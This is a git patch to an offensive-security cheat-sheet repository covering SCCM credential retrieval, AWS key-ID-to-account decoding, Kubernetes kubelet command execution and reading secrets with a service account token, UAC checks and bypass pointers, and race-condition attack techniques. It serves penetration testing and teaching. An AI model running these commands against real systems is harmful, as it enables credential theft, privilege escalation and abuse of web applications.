From 07cf2831cac782cc0c7361e5811f448c815265f7 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 28 Oct 2023 17:31:59 +0200 Subject: [PATCH] AWS Key ID + UAC + Race Condition --- .../Active Directory Attack.md | 7 ++ .../Cloud - AWS Pentest.md | 25 +++++- .../Container - Docker Pentest.md | 2 +- .../Container - Kubernetes Pentest.md | 39 +++++++--- .../Windows - Defenses.md | 28 +++++++ Race Condition/README.md | 78 +++++++++++++++---- 6 files changed, 153 insertions(+), 26 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3807101..a9b5d5b 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -4048,6 +4048,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th > If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. +On the machine. * Find SCCM blob ```ps1 Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" @@ -4065,6 +4066,12 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th ConvertFrom-SddlString "" ``` +From a remote machine. +* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter) + ```ps1 + python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto + ``` + ## SCCM Shares diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 6129a3f..53a9499 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -247,7 +247,7 @@ ### Access Key ID & Secret -> IAM uses the following prefixes to indicate what type of resource each unique ID applies to. +IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key. | Prefix | Resource type | |--------------|-------------------------| @@ -264,6 +264,28 @@ | ASCA | Certificate | | ASIA | Temporary (AWS STS) access key | +The rest of the string is Base32 encoded and can be used to recover the account id. + +```py +import base64 +import binascii + +def AWSAccount_from_AWSKeyID(AWSKeyID): + + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix + x = base64.b32decode(trimmed_AWSKeyID) #base32 decode + y = x[0:6] + + z = int.from_bytes(y, byteorder='big', signed=False) + mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) + + e = (z & mask)>>7 + return (e) + + +print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) +``` + ## AWS - Metadata SSRF @@ -2385,3 +2407,4 @@ aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" * [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) * [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) * [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) +* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) \ No newline at end of file diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index b836acd..eff3dc6 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md @@ -1,4 +1,4 @@ -# Container - Docker Pentest +# Container - Docker > Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. diff --git a/Methodology and Resources/Container - Kubernetes Pentest.md b/Methodology and Resources/Container - Kubernetes Pentest.md index c59775f..5d39b0f 100644 --- a/Methodology and Resources/Container - Kubernetes Pentest.md +++ b/Methodology and Resources/Container - Kubernetes Pentest.md @@ -1,12 +1,13 @@ -# Container - Kubernetes Pentest +# Container - Kubernetes -> Kubernetes commonly stylized as K8s) is an open-source container orchestration system for automating software deployment, scaling, and management. +> Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications ## Summary - [Tools](#tools) -- [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp) -- [Obtaining Service Account Token](#obtaining-service-account-token) +- [Exploits](#exploits) + - [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp) + - [Obtaining Service Account Token](#obtaining-service-account-token) - [References](#references) ## Tools @@ -22,9 +23,26 @@ kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml ``` -* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) +* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) - Executes commands in a container on a kubelet endpoint that allows anonymous authentication +* [DataDog/KubeHound](https://github.com/DataDog/KubeHound) - Kubernetes Attack Graph + ```ps1 + # Critical paths enumeration + kh.containers().criticalPaths().count() + kh.containers().dedup().by("name").criticalPaths().count() + kh.endpoints(EndpointExposure.ClusterIP).criticalPaths().count() + kh.endpoints(EndpointExposure.NodeIP).criticalPaths().count() + kh.endpoints(EndpointExposure.External).criticalPaths().count() + kh.services().criticalPaths().count() -## Accessible kubelet on 10250/TCP + # DNS services and port + kh.endpoints(EndpointExposure.External).criticalPaths().limit(local,1) + .dedup().valueMap("serviceDns","port") + .group().by("serviceDns").by("port") + ``` + +## Exploits + +### Accessible kubelet on 10250/TCP Requirements: * `--anonymous-auth`: Enables anonymous requests to the Kubelet server @@ -32,15 +50,18 @@ Requirements: * Getting pods: `curl -ks https://worker:10250/pods` * Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'` -## Obtaining Service Account Token + +### Obtaining Service Account Token Token is stored at `/var/run/secrets/kubernetes.io/serviceaccount/token` Use the service account token: -* on kube-apiserver API: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` +* on `kube-apiserver` API: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` * with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="" get secrets --all-namespaces -o json` ## References -* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet) \ No newline at end of file +* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet) +* [kubehound - Attack Reference](https://kubehound.io/reference/attacks/) +* [KubeHound: Identifying attack paths in Kubernetes clusters - Datadog - October 2, 2023](https://securitylabs.datadoghq.com/articles/kubehound-identify-kubernetes-attack-paths/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Defenses.md b/Methodology and Resources/Windows - Defenses.md index 50d0298..d346323 100644 --- a/Methodology and Resources/Windows - Defenses.md +++ b/Methodology and Resources/Windows - Defenses.md @@ -3,6 +3,7 @@ ## Summary * [AppLocker](#applocker) +* [User Account Control](#user-account-control) * [DPAPI](#dpapi) * [Powershell](#powershell) * [Anti Malware Scan Interface](#anti-malware-scan-interface) @@ -36,6 +37,33 @@ * [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md) +## User Account Control + +UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and is present in all subsequent versions of the Windows operating system. UAC helps mitigate the impact of malware and helps protect users by asking for permission or an administrator's password before allowing changes to be made to the system that could potentially affect all users of the computer. + +* Check if UAC is enabled + ```ps1 + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA + ``` +* Check UAC level + ``` + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken + ``` + +| EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description | +|---|---|---|---| +| 0 | / | / | No UAC | +| 1 | 1 | / | No UAC | +| 1 | 0 | 0 | No UAC for RID 500 | +| 1 | 0 | 1 | UAC for Everyone | + + +* UAC Bypass + * [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc + * [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control + + ## DPAPI Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md) diff --git a/Race Condition/README.md b/Race Condition/README.md index 60d18fe..afcfdbc 100644 --- a/Race Condition/README.md +++ b/Race Condition/README.md @@ -4,31 +4,42 @@ ## Summary -- [Race Condition](#race-condition) - - [Summary](#summary) - - [Tools](#tools) - - [Labs](#labs) - - [Limit-overrun](#limit-overrun) - - [Rate-limit bypass](#rate-limit-bypass) - - [Turbo Intruder](#turbo-intruder) +- [Tools](#tools) +- [Labs](#labs) +- [Exploit](#exploit) + - [Limit-overrun](#limit-overrun) + - [Rate-limit bypass](#rate-limit-bypass) +- [Techniques](#techniques) + - [HTTP/1.1 last-byte synchronization](#http11-last-byte-synchronization) + - [HTTP/2 Single-packet attack](#http2-single-packet-attack) +- [Turbo Intruder](#turbo-intruder) - [Example 1](#example-1) - [Example 2](#example-2) - - [References](#references) +- [References](#references) ## Tools -* [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder) +* [PortSwigger/turbo-intruder](https://github.com/PortSwigger/turbo-intruder) - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. +* [JavanXD/Raceocat](https://github.com/JavanXD/Raceocat) - Make exploiting race conditions in web applications highly efficient and ease-of-use. ## Labs * [PortSwigger - Limit overrun race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun) +* [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint) +* [PortSwigger - Bypassing rate limits via race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-bypassing-rate-limits) +* [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint) +* [PortSwigger - Single-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) +* [PortSwigger - Exploiting time-sensitive vulnerabilities](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) +* [PortSwigger - Partial construction race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) -## Limit-overrun +## Exploit -TODO +### Limit-overrun + +Overdrawing limit, multiple voting, multiple spending of a gifcard. **Examples**: @@ -37,13 +48,48 @@ TODO * [Register multiple users using one invitation - @franjkovic](https://hackerone.com/reports/148609) -## Rate-limit bypass +### Rate-limit bypass -TODO +Bypassing anti-bruteforce mechanism and 2FA. **Examples**: -* []() +* [Instagram Password Reset Mechanism Race Condition - Laxman Muthiyah](https://youtu.be/4O9FjTMlHUM) + + +## Techniques + +### HTTP/1.1 last-byte synchronization + +Send every requests execpt the last byte, then "release" each request by sending the last byte. + +Execute a last-byte synchronization using Turbo Intruder + +```py +engine.queue(request, gate='race1') +engine.queue(request, gate='race1') +engine.openGate('race1') +``` + +**Examples**: + +* [Cracking reCAPTCHA, Turbo Intruder style - James Kettle](https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style) + + +### HTTP/2 Single-packet attack + +In HTTP/2 you can send multiple HTTP requests concurrently over a single connection. In the single-packet attack around ~20/30 requests will be sent and they will arrive at the same time on the server. Using a single request remove the network jitter. + +* [turbo-intruder/race-single-packet-attack.py](https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py) +* Burp Suite + * Send a request to Repeater + * Duplicate the request 20 times (CTRL+R) + * Create a new group and add all the requests + * Send group in parallel (single-packet attack) + +**Examples**: + +* [CVE-2022-4037 - Discovering a race condition vulnerability in Gitlab with the single-packet attack - James Kettle](https://youtu.be/Y0NVIVucQNE) ## Turbo Intruder @@ -115,7 +161,9 @@ def handleResponse(req, interesting): ## References * [DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle](https://youtu.be/tKJzsaB1ZvI) +* [Smashing the state machine: the true potential of web race conditions - James Kettle / @albinowax - 09 August 2023](https://portswigger.net/research/smashing-the-state-machine) * [Turbo Intruder: Embracing the billion-request attack - James Kettle - 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) * [Race Condition Bug In Web App: A Use Case - Mandeep Jadon - Apr 24, 2018](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) * [Race conditions on the web - Josip Franjkovic - July 12th, 2016](https://www.josipfranjkovic.com/blog/race-conditions-on-web) -* [New techniques and tools for web race conditions - Emma Stocks - 10 August 2023](https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions) \ No newline at end of file +* [New techniques and tools for web race conditions - Emma Stocks - 10 August 2023](https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions) +* [Exploiting Race Condition Vulnerabilities in Web Applications - Javan Rasokat](https://conference.hitb.org/hitbsecconf2022sin/materials/D2%20COMMSEC%20-%20Exploiting%20Race%20Condition%20Vulnerabilities%20in%20Web%20Applications%20-%20Javan%20Rasokat.pdf) \ No newline at end of file